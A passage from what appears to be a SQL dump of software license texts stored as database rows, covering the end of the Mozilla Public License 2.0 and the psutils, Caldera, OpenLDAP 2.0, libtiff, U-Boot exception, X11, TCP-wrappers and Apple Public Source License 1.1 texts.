or\n\n(b) any new file in Source Code Form that contains any Covered Software.\n\n1.11. \"Patent Claims\" of a Contributor means any patent claim(s), including\nwithout limitation, method, process, and apparatus claims, in any patent Licensable\nby such Contributor that would be infringed, but for the grant of the License,\nby the making, using, selling, offering for sale, having made, import, or\ntransfer of either its Contributions or its Contributor Version.\n\n1.12. \"Secondary License\" means either the GNU General Public License, Version\n2.0, the GNU Lesser General Public License, Version 2.1, the GNU Affero General\nPublic License, Version 3.0, or any later versions of those licenses.\n\n1.13. \"Source Code Form\" means the form of the work preferred for making modifications.\n\n1.14. \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder this License. For legal entities, \"You\" includes any entity that controls,\nis controlled by, or is under common control with You. For purposes of this\ndefinition, \"control\" means (a) the power, direct or indirect, to cause the\ndirection or management of such entity, whether by contract or otherwise,\nor (b) ownership of more than fifty percent (50%) of the outstanding shares\nor beneficial ownership of such entity.\n\n 2. License Grants and Conditions\n\n 2.1. Grants\n\nEach Contributor hereby grants You a world-wide, royalty-free, non-exclusive\nlicense:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby such Contributor to use, reproduce, make available, modify, display, perform,\ndistribute, and otherwise exploit its Contributions, either on an unmodified\nbasis, with Modifications, or as part of a Larger Work; and\n\n(b) under Patent Claims of such Contributor to make, use, sell, offer for\nsale, have made, import, and otherwise transfer either its Contributions or\nits Contributor Version.\n\n 2.2. Effective Date\n\nThe licenses granted in Section 2.1 with respect to any Contribution become\neffective for each Contribution on the date the Contributor first distributes\nsuch Contribution.\n\n 2.3. Limitations on Grant Scope\n\nThe licenses granted in this Section 2 are the only rights granted under this\nLicense. No additional rights or licenses will be implied from the distribution\nor licensing of Covered Software under this License. Notwithstanding Section\n2.1(b) above, no patent license is granted by a Contributor:\n\n(a) for any code that a Contributor has removed from Covered Software; or\n\n(b) for infringements caused by: (i) Your and any other third party\'s modifications\nof Covered Software, or (ii) the combination of its Contributions with other\nsoftware (except as part of its Contributor Version); or\n\n(c) under Patent Claims infringed by Covered Software in the absence of its\nContributions.\n\nThis License does not grant any rights in the trademarks, service marks, or\nlogos of any Contributor (except as may be necessary to comply with the notice\nrequirements in Section 3.4).\n\n 2.4. Subsequent Licenses\n\nNo Contributor makes additional grants as a result of Your choice to distribute\nthe Covered Software under a subsequent version of this License (see Section\n10.2) or under the terms of a Secondary License (if permitted under the terms\nof Section 3.3).\n\n 2.5. Representation\n\nEach Contributor represents that the Contributor believes its Contributions\nare its original creation(s) or it has sufficient rights to grant the rights\nto its Contributions conveyed by this License.\n\n 2.6. Fair Use\n\nThis License is not intended to limit any rights You have under applicable\ncopyright doctrines of fair use, fair dealing, or other equivalents.\n\n 2.7. Conditions\n\nSections 3.1, 3.2, 3.3, and 3.4 are conditions of the licenses granted in\nSection 2.1.\n\n 3. Responsibilities\n\n 3.1. Distribution of Source Form\n\nAll distribution of Covered Software in Source Code Form, including any Modifications\nthat You create or to which You contribute, must be under the terms of this\nLicense. You must inform recipients that the Source Code Form of the Covered\nSoftware is governed by the terms of this License, and how they can obtain\na copy of this License. You may not attempt to alter or restrict the recipients\'\nrights in the Source Code Form.\n\n 3.2. Distribution of Executable Form\n\n If You distribute Covered Software in Executable Form then:\n\n(a) such Covered Software must also be made available in Source Code Form,\nas described in Section 3.1, and You must inform recipients of the Executable\nForm how they can obtain a copy of such Source Code Form by reasonable means\nin a timely manner, at a charge no more than the cost of distribution to the\nrecipient; and\n\n(b) You may distribute such Executable Form under the terms of this License,\nor sublicense it under different terms, provided that the license for the\nExecutable Form does not attempt to limit or alter the recipients\' rights\nin the Source Code Form under this License.\n\n 3.3. Distribution of a Larger Work\n\nYou may create and distribute a Larger Work under terms of Your choice, provided\nthat You also comply with the requirements of this License for the Covered\nSoftware. If the Larger Work is a combination of Covered Software with a work\ngoverned by one or more Secondary Licenses, and the Covered Software is not\nIncompatible With Secondary Licenses, this License permits You to additionally\ndistribute such Covered Software under the terms of such Secondary License(s),\nso that the recipient of the Larger Work may, at their option, further distribute\nthe Covered Software under the terms of either this License or such Secondary\nLicense(s).\n\n 3.4. Notices\n\nYou may not remove or alter the substance of any license notices (including\ncopyright notices, patent notices, disclaimers of warranty, or limitations\nof liability) contained within the Source Code Form of the Covered Software,\nexcept that You may alter any license notices to the extent required to remedy\nknown factual inaccuracies.\n\n 3.5. Application of Additional Terms\n\nYou may choose to offer, and to charge a fee for, warranty, support, indemnity\nor liability obligations to one or more recipients of Covered Software. However,\nYou may do so only on Your own behalf, and not on behalf of any Contributor.\nYou must make it absolutely clear that any such warranty, support, indemnity,\nor liability obligation is offered by You alone, and You hereby agree to indemnify\nevery Contributor for any liability incurred by such Contributor as a result\nof warranty, support, indemnity or liability terms You offer. You may include\nadditional disclaimers of warranty and limitations of liability specific to\nany jurisdiction.\n\n 4. Inability to Comply Due to Statute or Regulation\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Software due to statute, judicial\norder, or regulation then You must: (a) comply with the terms of this License\nto the maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be placed in a text file included with\nall distributions of the Covered Software under this License. Except to the\nextent prohibited by statute or regulation, such description must be sufficiently\ndetailed for a recipient of ordinary skill to be able to understand it.\n\n 5. Termination\n\n5.1. The rights granted under this License will terminate automatically if\nYou fail to comply with any of its terms. However, if You become compliant,\nthen the rights granted under this License from a particular Contributor are\nreinstated (a) provisionally, unless and until such Contributor explicitly\nand finally terminates Your grants, and (b) on an ongoing basis, if such Contributor\nfails to notify You of the non-compliance by some reasonable means prior to\n60 days after You have come back into compliance. Moreover, Your grants from\na particular Contributor are reinstated on an ongoing basis if such Contributor\nnotifies You of the non-compliance by some reasonable means, this is the first\ntime You have received notice of non-compliance with this License from such\nContributor, and You become compliant prior to 30 days after Your receipt\nof the notice.\n\n5.2. If You initiate litigation against any entity by asserting a patent infringement\nclaim (excluding declaratory judgment actions, counter-claims, and cross-claims)\nalleging that a Contributor Version directly or indirectly infringes any patent,\nthen the rights granted to You by any and all Contributors for the Covered\nSoftware under Section 2.1 of this License shall terminate.\n\n5.3. In the event of termination under Sections 5.1 or 5.2 above, all end\nuser license agreements (excluding distributors and resellers) which have\nbeen validly granted by You or Your distributors under this License prior\nto termination shall survive termination.\n\n 6. Disclaimer of Warranty\n\nCovered Software is provided under this License on an \"as is\" basis, without\nwarranty of any kind, either expressed, implied, or statutory, including,\nwithout limitation, warranties that the Covered Software is free of defects,\nmerchantable, fit for a particular purpose or non-infringing. The entire risk\nas to the quality and performance of the Covered Software is with You. Should\nany Covered Software prove defective in any respect, You (not any Contributor)\nassume the cost of any necessary servicing, repair, or correction. This disclaimer\nof warranty constitutes an essential part of this License. No use of any Covered\nSoftware is authorized under this License except under this disclaimer.\n\n 7. Limitation of Liability\n\nUnder no circumstances and under no legal theory, whether tort (including\nnegligence), contract, or otherwise, shall any Contributor, or anyone who\ndistributes Covered Software as permitted above, be liable to You for any\ndirect, indirect, special, incidental, or consequential damages of any character\nincluding, without limitation, damages for lost profits, loss of goodwill,\nwork stoppage, computer failure or malfunction, or any and all other commercial\ndamages or losses, even if such party shall have been informed of the possibility\nof such damages. This limitation of liability shall not apply to liability\nfor death or personal injury resulting from such party\'s negligence to the\nextent applicable law prohibits such limitation. Some jurisdictions do not\nallow the exclusion or limitation of incidental or consequential damages,\nso this exclusion and limitation may not apply to You.\n\n 8. Litigation\n\nAny litigation relating to this License may be brought only in the courts\nof a jurisdiction where the defendant maintains its principal place of business\nand such litigation shall be governed by laws of that jurisdiction, without\nreference to its conflict-of-law provisions. Nothing in this Section shall\nprevent a party\'s ability to bring cross-claims or counter-claims.\n\n 9. Miscellaneous\n\nThis License represents the complete agreement concerning the subject matter\nhereof. If any provision of this License is held to be unenforceable, such\nprovision shall be reformed only to the extent necessary to make it enforceable.\nAny law or regulation which provides that the language of a contract shall\nbe construed against the drafter shall not be used to construe this License\nagainst a Contributor.\n\n 10. Versions of the License\n\n 10.1. New Versions\n\nMozilla Foundation is the license steward. Except as provided in Section 10.3,\nno one other than the license steward has the right to modify or publish new\nversions of this License. Each version will be given a distinguishing version\nnumber.\n\n 10.2. Effect of New Versions\n\nYou may distribute the Covered Software under the terms of the version of\nthe License under which You originally received the Covered Software, or under\nthe terms of any subsequent version published by the license steward.\n\n 10.3. Modified Versions\n\nIf you create software not governed by this License, and you want to create\na new license for such software, you may create and use a modified version\nof this License if you rename the license and remove any references to the\nname of the license steward (except to note that such modified license differs\nfrom this License).\n\n10.4. Distributing Source Code Form that is Incompatible With Secondary Licenses\n\nIf You choose to distribute Source Code Form that is Incompatible With Secondary\nLicenses under the terms of this version of the License, the notice described\nin Exhibit B of this License must be attached. Exhibit A - Source Code Form\nLicense Notice\n\nThis Source Code Form is subject to the terms of the Mozilla Public License,\nv. 2.0. If a copy of the MPL was not distributed with this file, You can obtain\none at http://mozilla.org/MPL/2.0/.\n\nIf it is not possible or desirable to put the notice in a particular file,\nthen You may include the notice in a location (such as a LICENSE file in a\nrelevant directory) where a recipient would be likely to look for such a notice.\n\nYou may add additional accurate notices of copyright ownership.\n\nExhibit B - \"Incompatible With Secondary Licenses\" Notice\n\nThis Source Code Form is \"Incompatible With Secondary Licenses\", as defined\nby the Mozilla Public License, v. 2.0.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(55,'psutils','PS Utilities Package\n\nThe constituent files of this package listed below are copyright (C) 1991-1995\nAngus J. C. Duggan.\n\nLICENSE Makefile.msc Makefile.nt Makefile.os2\n\nMakefile.unix README config.h descrip.mms\n\nepsffit.c epsffit.man extractres.man extractres.pl\n\nfixdlsrps.man fixdlsrps.pl fixfmps.man fixfmps.pl\n\nfixmacps.man fixmacps.pl fixpsditps.man fixpsditps.pl\n\nfixpspps.man fixpspps.pl fixscribeps.man fixscribeps.pl\n\nfixtpps.man fixtpps.pl fixwfwps.man fixwfwps.pl\n\nfixwpps.man fixwpps.pl fixwwps.man fixwwps.pl\n\ngetafm getafm.man includeres.man includeres.pl\n\nmaketext patchlev.h psbook.c psbook.man\n\npserror.c pserror.h psmerge.man psmerge.pl\n\npsnup.c psnup.man psresize.c psresize.man\n\npsselect.c psselect.man psspec.c psspec.h\n\npstops.c pstops.man psutil.c psutil.h\n\nshowchar\n\nThey may be copied and used for any purpose (including distribution as part\nof a for-profit product), provided:\n\n1) The original attribution of the programs is clearly displayed in the product\nand/or documentation, even if the programs are modified and/or renamed as\npart of the product.\n\n2) The original source code of the programs is provided free of charge (except\nfor reasonable distribution costs). For a definition of reasonable distribution\ncosts, see the Gnu General Public License or Larry Wall\'s Artistic License\n(provided with the Perl 4 kit). The GPL and Artistic License in NO WAY affect\nthis license; they are merely used as examples of the spirit in which it is\nintended.\n\n3) These programs are provided \"as-is\". No warranty or guarantee of their\nfitness for any particular task is provided. Use of these programs is completely\nat your own risk.\n\nBasically, I don\'t mind how you use the programs so long as you acknowledge\nthe author, and give people the originals if they want them.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(56,'Caldera','Caldera International, Inc. hereby grants a fee free license that includes\nthe rights use, modify and distribute this named source code, including creating\nderived binary products created from the source code. The source code for\nwhich Caldera International, Inc. grants rights are limited to the following\nUNIX Operating Systems that operate on the 16-Bit PDP-11 CPU and early versions\nof the 32-Bit UNIX Operating System, with specific exclusion of UNIX System\nIII and UNIX System V and successor operating systems:\n\n32-bit 32V UNIX\n\n16 bit UNIX Versions 1, 2, 3, 4, 5, 6, 7\n\nCaldera International, Inc. makes no guarantees or commitments that any source\ncode is available from Caldera International, Inc.\n\nThe following copyright notice applies to the source code files for which\nthis license is granted.\n\nCopyright(C) Caldera International Inc. 2001-2002. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\nRedistributions of source code and documentation must retain the above copyright\nnotice, this list of conditions and the following disclaimer.\n\nRedistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\nAll advertising materials mentioning features or use of this software must\ndisplay the following acknowledgement:\n\n \n\nThis product includes software developed or owned by Caldera International,\nInc.\n\nNeither the name of Caldera International, Inc. nor the names of other contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nUSE OF THE SOFTWARE PROVIDED FOR UNDER THIS LICENSE BY CALDERA INTERNATIONAL,\nINC. AND CONTRIBUTORS ``AS IS\'\' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\nFOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CALDERA INTERNATIONAL,\nINC. BE LIABLE FOR ANY DIRECT, INDIRECT INCIDENTAL, SPECIAL, EXEMPLARY, OR\nCONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE\nGOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\nHOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\nLIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\nOUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(57,'OLDAP-2.0','The OpenLDAP Public License\n\nVersion 2.0, 7 June 1999\n\nCopyright 1999, The OpenLDAP Foundation, Redwood City, California, USA. All\nRights Reserved.\n\nRedistribution and use of this software and associated documentation (\"Software\"),\nwith or without modification, are permitted provided that the following conditions\nare met:\n\n1. Redistributions of source code must retain copyright statements and notices.\nRedistributions must also contain a copy of this document.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. The name \"OpenLDAP\" must not be used to endorse or promote products derived\nfrom this Software without prior written permission of the OpenLDAP Foundation.\nFor written permission, please contact foundation@openldap.org.\n\n4. Products derived from this Software may not be called \"OpenLDAP\" nor may\n\"OpenLDAP\" appear in their names without prior written permission of the OpenLDAP\nFoundation. OpenLDAP is a registered trademark of the OpenLDAP Foundation.\n\n5. Due credit should be given to the OpenLDAP Project (http://www.openldap.org/).\n\nTHIS SOFTWARE IS PROVIDED BY THE OPENLDAP FOUNDATION AND CONTRIBUTORS ``AS\nIS\'\' AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE OPENLDAP FOUNDATION OR ITS CONTRIBUTORS\nBE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(58,'libtiff','Copyright (c) 1988-1997 Sam Leffler\n\nCopyright (c) 1991-1997 Silicon Graphics, Inc.\n\nPermission to use, copy, modify, distribute, and sell this software and its\ndocumentation for any purpose is hereby granted without fee, provided that\n(i) the above copyright notices and this permission notice appear in all copies\nof the software and related documentation, and (ii) the names of Sam Leffler\nand Silicon Graphics may not be used in any advertising or publicity relating\nto the software without the specific, prior written permission of Sam Leffler\nand Silicon Graphics.\n\nTHE SOFTWARE IS PROVIDED \"AS-IS\" AND WITHOUT WARRANTY OF ANY KIND, EXPRESS,\nIMPLIED OR OTHERWISE, INCLUDING WITHOUT LIMITATION, ANY WARRANTY OF MERCHANTABILITY\nOR FITNESS FOR A PARTICULAR PURPOSE.\n\nIN NO EVENT SHALL SAM LEFFLER OR SILICON GRAPHICS BE LIABLE FOR ANY SPECIAL,\nINCIDENTAL, INDIRECT OR CONSEQUENTIAL DAMAGES OF ANY KIND, OR ANY DAMAGES\nWHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER OR NOT ADVISED\nOF THE POSSIBILITY OF DAMAGE, AND ON ANY THEORY OF LIABILITY, ARISING OUT\nOF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(59,'u-boot-exception-2.0','GPL License Exception:\n\nEven though U-Boot in general is covered by the GPL-2.0/GPL-2.0+, this does *not* cover the so-called \"standalone\" applications that use U-Boot services by means of the jump table provided by U-Boot exactly for this purpose - this is merely considered normal use of U-Boot, and does *not* fall under the heading of \"derived work\".\n\nThe header files \"include/image.h\" and \"arch/*/include/asm/u-boot.h\" define interfaces to U-Boot. Including these (unmodified) header files in another file is considered normal use of U-Boot, and does *not* fall under the heading of \"derived work\".\n\n-- Wolfgang Denk\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(60,'X11','X11 License\n\nCopyright (C) 1996 X Consortium\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE X CONSORTIUM\nBE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\nOF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH\nTHE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nExcept as contained in this notice, the name of the X Consortium shall not\nbe used in advertising or otherwise to promote the sale, use or other dealings\nin this Software without prior written authorization from the X Consortium.\n\nX Window System is a trademark of X Consortium, Inc.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(61,'TCP-wrappers','Copyright 1995 by Wietse Venema. All rights reserved. Some individual files\nmay be covered by other copyrights.\n\nThis material was originally written and compiled by Wietse Venema at Eindhoven\nUniversity of Technology, The Netherlands, in 1990, 1991, 1992, 1993, 1994\nand 1995.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that this entire copyright notice is duplicated in\nall such copies.\n\nThis software is provided \"as is\" and without any expressed or implied warranties,\nincluding, without limitation, the implied warranties of merchantibility and\nfitness for any particular purpose.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(62,'APSL-1.1','APPLE PUBLIC SOURCE LICENSE\n\nVersion 1.1 - April 19, 1999 Please read this License carefully before downloading\nthis software.\n\nBy downloading and using this software, you are agreeing to be bound by the\nterms of this License. If you do not or cannot agree to the terms of this\nLicense, please do not download or use the software.\n\n1. General; Definitions. This License applies to any program or other work\nwhich Apple Computer, Inc. (\"Apple\") publicly announces as subject to this\nApple Public Source License and which contains a notice placed by Apple identifying\nsuch program or work as \"Original Code\" and stating that it is subject to\nthe terms of this Apple Public Source License version 1.1 (or subsequent version\nthereof), as it may be revised from time to time by Apple (\"License\"). As\nused in this License:\n\n1.1 \"Affected Original Code\" means only those specific portions of Original\nCode that allegedly infringe upon any party\'s intellectual property rights\nor are otherwise the subject of a claim of infringement.\n\n1.2 \"Applicable Patent Rights\" mean: (a) in the case where Apple is the grantor\nof rights, (i) claims of patents that are now or hereafter acquired, owned\nby or assigned to Apple and (ii) that cover subject matter contained in the\nOriginal Code, but only to the extent necessary to use, reproduce and/or distribute\nthe Original Code without infringement; and (b) in the case where You are\nthe grantor of rights, (i) claims of patents that are now or hereafter acquired,\nowned by or assigned to You and (ii) that cover subject matter in Your Modifications,\ntaken alone or in combination with Original Code.\n\n1.3 \"Covered Code\" means the Original Code, Modifications, the combination\nof Original Code and any Modifications, and/or any respective portions thereof.\n\n1.4 \"Deploy\" means to use, sublicense or distribute Covered Code other than\nfor Your internal research and development (R&D), and includes without limitation,\nany and all internal use or distribution of Covered Code within Your business\nor organization except for R&D use, as well as direct or indirect sublicensing\nor distribution of Covered Code by You to any third party in any form or manner.\n\n1.5 \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n1.6 \"Modifications\" mean any addition to, deletion from, and/or change to,\nthe substance and/or structure of Covered Code. When code is released as a\nseries of files, a Modification is: (a) any addition to or deletion from the\ncontents of a file containing Covered Code; and/or (b) any new file or other\nrepresentation of computer program statements that contains any part of Covered\nCode.\n\n1.7 \"Original Code\" means (a) the Source Code of a program or other work as\noriginally made available by Apple under this License, including the Source\nCode of any updates or upgrades to such programs or works made available by\nApple under this License, and that has been expressly identified by Apple\nas such in the header file(s) of such work; and (b) the object code compiled\nfrom such Source Code and originally made available by Apple under this License.\n\n1.8 \"Source Code\" means the human readable form of a program or other work\nthat is suitable for making modifications to it, including all modules it\ncontains, plus any associated interface definition files, scripts used to\ncontrol compilation and installation of an executable (object code).\n\n1.9 \"You\" or \"Your\" means an individual or a legal entity exercising rights\nunder this License. For legal entities, \"You\" or \"Your\" includes any entity\nwhich controls, is controlled by, or is under common control with, You, where\n\"control\" means (a) the power, direct or indirect, to cause the direction\nor management of such entity, whether by contract or otherwise, or (b) ownership\nof fifty percent (50%) or more of the outstanding shares or beneficial ownership\nof such entity.\n\n2. Permitted Uses; Conditions & Restrictions. Subject to the terms and conditions\nof this License, Apple hereby grants You, effective on the date You accept\nthis License and download the Original Code, a world-wide, royalty-free, non-\nexclusive license, to the extent of Apple\'s Applicable Patent Rights and copyrights\ncovering the Original Code, to do the following:\n\n2.1 You may use, copy, modify and distribute Original Code, with or without\nModifications, solely for Your internal research and development, provided\nthat You must in each instance:\n\n(a) retain and reproduce in all copies of Original Code the copyright and\nother proprietary notices and disclaimers of Apple as they appear in the Original\nCode, and keep intact all notices in the Original Code that refer to this\nLicense;\n\n(b) include a copy of this License with every copy of Source Code of Covered\nCode and documentation You distribute, and You may not offer or impose any\nterms on such Source Code that alter or restrict this License or the recipients\'\nrights hereunder, except as permitted under Section 6; and\n\n(c) completely and accurately document all Modifications that you have made\nand the date of each such Modification, designate the version of the Original\nCode you used, prominently include a file carrying such information with the\nModifications, and duplicate the notice in Exhibit A in each file of the Source\nCode of all such Modifications.\n\n 2.2 You may Deploy Covered Code, provided that You must in each instance:\n\n(a) satisfy all the conditions of Section 2.1 with respect to the Source Code\nof the Covered Code;\n\n(b) make all Your Deployed Modifications publicly available in Source Code\nform via electronic distribution (e.g. download from a web site) under the\nterms of this License and subject to the license grants set forth in Section\n3 below, and any additional terms You may choose to offer under Section 6.\nYou must continue to make the Source Code of Your Deployed Modifications available\nfor as long as you Deploy the Covered Code or twelve (12) months from the\ndate of initial Deployment, whichever is longer;\n\n(c) if You Deploy Covered Code containing Modifications made by You, inform\nothers of how to obtain those Modifications by filling out and submitting\nthe information found at http://www.apple.com/publicsource/modifications.html,\nif available; and\n\n(d) if You Deploy Covered Code in object code, executable form only, include\na prominent notice, in the code itself as well as in related documentation,\nstating that Source Code of the Covered Code is available under the terms\nof this License with information on how and where to obtain such Source Code.\n\n3. Your Grants. In consideration of, and as a condition to, the licenses granted\nto You under this License:\n\n(a) You hereby grant to Apple and all third parties a non-exclusive, royalty-free\nlicense, under Your Applicable Patent Rights and other intellectual property\nrights owned or controlled by You, to use, reproduce, modify, distribute and\nDeploy Your Modifications of the same scope and extent as Apple\'s licenses\nunder Sections 2.1 and 2.2; and\n\n(b) You hereby grant to Apple and its subsidiaries a non-exclusive, worldwide,\nroyalty-free, perpetual and irrevocable license, under Your Applicable Patent\nRights and other intellectual property rights owned or controlled by You,\nto use, reproduce, execute, compile, display, perform, modify or have modified\n(for Apple and/or its subsidiaries), sublicense and distribute Your Modifications,\nin any form, through multiple tiers of distribution.\n\n4. Larger Works. You may create a Larger Work by combining Covered Code with\nother code not governed by the terms of this License and distribute the Larger\nWork as a single product. In each such instance, You must make sure the requirements\nof this License are fulfilled for the Covered Code or any portion thereof.\n\n5. Limitations on Patent License. Except as expressly stated in Section 2,\nno other patent rights, express or implied, are granted by Apple herein. Modifications\nand/or Larger Works may require additional patent licenses from Apple which\nApple may grant in its sole discretion.\n\n6. Additional Terms. You may choose to offer, and to charge a fee for, warranty,\nsupport, indemnity or liability obligations and/or other rights consistent\nwith the scope of the license granted herein (\"Additional Terms\") to one or\nmore recipients of Covered Code. However, You may do so only on Your own behalf\nand as Your sole responsibility, and not on behalf of Apple. You must obtain\nthe recipient\'s agreement that any such Additional Terms are offered by You\nalone, and You hereby agree to indemnify, defend and hold Apple harmless for\nany liability incurred by or claims asserted against Apple by reason of any\nsuch Additional Terms.\n\n7. Versions of the License. Apple may publish revised and/or new versions\nof this License from time to time. Each version will be given a distinguishing\nversion number. Once Original Code has been published under a particular version\nof this License, You may continue to use it under the terms of that version.\nYou may also choose to use such Original Code under the terms of any subsequent\nversion of this License published by Apple. No one other than Apple has the\nright to modify the terms applicable to Covered Code created under this License.\n\n8. NO WARRANTY OR SUPPORT. The Original Code may contain in whole or in part\npre-release, untested, or not fully tested works. The Original Code may contain\nerrors that could cause failures or loss of data, and may be incomplete or\ncontain inaccuracies. You expressly acknowledge and agree that use of the\nOriginal Code, or any portion thereof, is at Your sole and entire risk. THE\nORIGINAL CODE IS PROVIDED \"AS IS\" AND WITHOUT WARRANTY, UPGRADES OR SUPPORT\nOF ANY KIND AND APPLE AND APPLE\'S LICENSOR(S) (FOR THE PURPOSES OF SECTIONS\n8 AND 9, APPLE AND APPLE\'S LICENSOR(S) ARE COLLECTIVELY REFERRED TO AS \"APPLE\")\nEXPRESSLY DISCLAIM ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF MERCHANTABILITY\nOR SATISFACTORY QUALITY AND FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT\nOF THIRD PARTY RIGHTS. APPLE DOES NOT WARRANT THAT THE FUNCTIONS CONTAINED\nIN THE ORIGINAL CODE WILL MEET YOUR REQUIREMENTS, OR THAT THE OPERATION OF\nTHE ORIGINAL CODE WILL BE UNINTERRUPTED OR ERROR- FREE, OR THAT DEFECTS IN\nTHE ORIGINAL CODE WILL BE CORRECTED. NO ORAL OR WRITTEN INFORMATION OR ADVICE\nGIVEN BY APPLE OR AN APPLE AUTHORIZED REPRESENTATIVE SHALL CREATE A WARRANTY\nOR IN ANY WAY INCREASE THE SCOPE OF THIS WARRANTY. You acknowledge that the\nOriginal Code is not intended for use in the operation of nuclear facilities,\naircraft navigation, communication systems, or air traffic control machines\nin which case the failure of the Original Code could lead to death, personal\ninjury, or severe physical or environmental damage.\n\n 9. Liability.\n\n9.1 Infringement. If any portion of, or functionality implemented by, the\nOriginal Code becomes the subject of a claim of infringement, Apple may, at\nits option: (a) attempt to procure the rights necessary for Apple and You\nto continue using the Affected Original Code; (b) modify the Affected Original\nCode so that it is no longer infringing; or (c) suspend Your rights to use,\nreproduce, modify, sublicense and distribute the Affected Original Code until\na final determination of the claim is made by a court or governmental administrative\nagency of competent jurisdiction and Apple lifts the suspension as set forth\nbelow. Such suspension of rights will be effective immediately upon Apple\'s\nposting of a notice to such effect on the Apple web site that is used for\nimplementation of this License. Upon such final determination being made,\nif Apple is legally able, without the payment of a fee or royalty, to resume\nuse, reproduction, modification, sublicensing and distribution of the Affected\nOriginal Code, Apple will lift the suspension of rights to the Affected Original\nCode by posting a notice to such effect on the Apple web site that is used\nfor implementation of this License. If Apple suspends Your rights to Affected\nOriginal Code, nothing in this License shall be construed to restrict You,\nat Your option and subject to applicable law, from replacing the Affected\nOriginal Code with non-infringing code or independently negotiating for necessary\nrights from such third party.\n\n9.2 LIMITATION OF LIABILITY. UNDER NO CIRCUMSTANCES SHALL APPLE BE LIABLE\nFOR ANY INCIDENTAL, SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES ARISING OUT\nOF OR RELATING TO THIS LICENSE OR YOUR USE OR INABILITY TO USE THE ORIGINAL\nCODE, OR ANY PORTION THEREOF, WHETHER UNDER A THEORY OF CONTRACT, WARRANTY,\nTORT (INCLUDING NEGLIGENCE), PRODUCTS LIABILITY OR OTHERWISE, EVEN IF APPLE\nHAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES AND NOTWITHSTANDING THE\nFAILURE OF ESSENTIAL PURPOSE OF ANY REMEDY. In no event shall Apple\'s total\nliability to You for all damages under this License exceed the amount of fifty\ndollars ($50.00).\n\n10. Trademarks. This License does not grant any rights to use the trademarks\nor trade names \"Apple\", \"Apple Computer\", \"Mac OS X\", \"Mac OS X Server\" or\nany other trademarks or trade names belonging to Apple (collectively \"Apple\nMarks\") and no Apple Marks may be used to endorse or promote products derived\nfrom the Original Code other than as permitted by and in strict compliance\nat all times with Apple\'s third party trademark usage guidelines which are\nposted at http://www.apple.com/legal/guidelinesfor3rdparties.html.\n\n11. Ownership. Apple retains all rights, title and interest in and to 